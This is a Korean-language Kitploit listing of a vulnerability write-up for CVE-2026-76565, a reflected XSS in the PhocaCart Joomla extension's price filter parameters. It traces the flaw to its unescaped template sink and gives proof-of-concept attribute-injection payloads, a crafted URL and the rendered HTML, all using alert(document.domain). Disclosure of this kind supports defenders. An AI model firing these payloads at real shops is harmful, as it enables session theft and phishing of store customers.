Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-76565 — PhocaCart의 price_from & price_to 필터 매개변수를 통한 Reflected XSS | Kitploit
도구/GitHubGitHub/toanln-cov/cve-2026-76565
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPapers & Research
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

PhocaCart의 price_from & price_to 필터 매개변수를 통한 Reflected XSS

저장소 보기
3일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PhocaCart의 price_from / price_to 필터 매개변수를 통한 반사형 XSS

PhocaCart ≤ 6.1.7 — 인증되지 않은 공격자가 조작된 가격 필터 URL을 통해 임의의 JavaScript 주입

CVE CVSS v4.0 CWE-79 Affected Researcher


요약

Joomla용 PhocaCart 6.1.7은 mod_phocacart_filter 모듈이 설치되어 게시된 경우 price_from 및 price_to GET 매개변수를 통해 반사형 사이트 간 스크립팅(XSS)에 취약합니다. 해당 매개변수는 strip_tags()만 적용하고 htmlspecialchars()는 적용하지 않는 Joomla의 'string' 입력 필터로 처리됩니다. 원시 값은 mod_phocacart_filter 모듈이 렌더링하는 가격 필터 양식의 HTML value="" 속성에 직접 출력됩니다.

공격자는 조작된 URL을 피해자에게 전달합니다. 피해자가 페이지를 로드하면 주입된 이벤트 핸들러가 브라우저에서 실행됩니다. 인증은 필요하지 않습니다. 이 공격은 별도로 배포되는 모듈인 mod_phocacart_filter가 설치되어 게시되어 있어야 합니다.


영향을 받는 버전

구성 요소취약 버전테스트 환경수정 버전
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

취약점 세부 정보

유형: 반사형 XSS (CWE-79) 필요한 인증: 없음 — 공개 상점 프런트엔드 CSRF 토큰 필요: 아니요 (GET 요청) 싱크 파일: site/layouts/form_filter_horizontal_text.php:65,71

근본 원인

Joomla의 'string' 입력 필터는 strip_tags()를 호출하며, HTML 태그는 제거하지만 ", ', > 같은 HTML 특수 문자는 인코딩되지 않은 채 남깁니다. price_from 및 price_to GET 매개변수는 이 필터로 검색되어 $data['getparams']에 저장됩니다. 템플릿 파일은 htmlspecialchars()를 호출하지 않고 이 값을 value="" 속성에 직접 출력하여 속성 컨텍스트 주입을 허용합니다.

데이터 흐름 — 소스에서 싱크까지:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — 취약한 싱크

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

동일한 싱크 패턴이 form_filter_text.php:81,87(세로 레이아웃 변형)에도 존재합니다. price_from 및 price_to 매개변수는 모두 동일하게 취약합니다.


개념 증명

1. 악성 URL 제작

공격자는 price_from 매개변수에 이벤트 핸들러 페이로드를 주입하여 상점 상품 보기를 대상으로 하는 URL을 구성합니다. 페이로드는 value="" 속성 컨텍스트를 빠져나갑니다.

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. 피해자가 페이지 로드 — 페이지 로드 시 XSS 실행

피해자가 조작된 URL을 열면 상점 상품 페이지가 가격 필터 양식을 렌더링합니다. 주입된 속성은 <input> 요소에 존재합니다. autofocus onfocus 페이로드를 사용하면 추가 사용자 상호작용 없이 페이지 로드 시 JavaScript가 즉시 실행됩니다.

렌더링된 HTML (취약):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

피해자 브라우저에서 실행되는 XSS 경고 대화상자 — alert(document.domain)이 상점 프런트엔드에서의 실행을 확인함

피해자 브라우저에서 XSS 실행 — alert(document.domain)이 상점 프런트엔드에서의 실행 컨텍스트를 확인함


영향

  1. 세션 쿠키 탈취 — 무기화된 페이로드가 피해자의 세션 쿠키를 공격자가 제어하는 서버로 유출시켜 계정 탈취를 가능하게 합니다.
  2. 피싱 / 자격 증명 수집 — 페이로드가 피해자를 공격자 도메인에 호스팅된 가짜 로그인 페이지로 리디렉션하여 신뢰할 수 있는 상점 도메인 이름 아래에서 자격 증명을 캡처할 수 있습니다.
  3. 악성코드 유포 — 상점의 신뢰할 수 있는 출처가 악용되어 공격자가 제작한 링크를 클릭하는 피해자에게 드라이브바이 다운로드 또는 익스플로잇 킷을 전달할 수 있습니다.

참조

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • GitHub 보안 권고: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • 공급업체 저장소: https://github.com/PhocaDesign/PhocaCart
도구 다운로드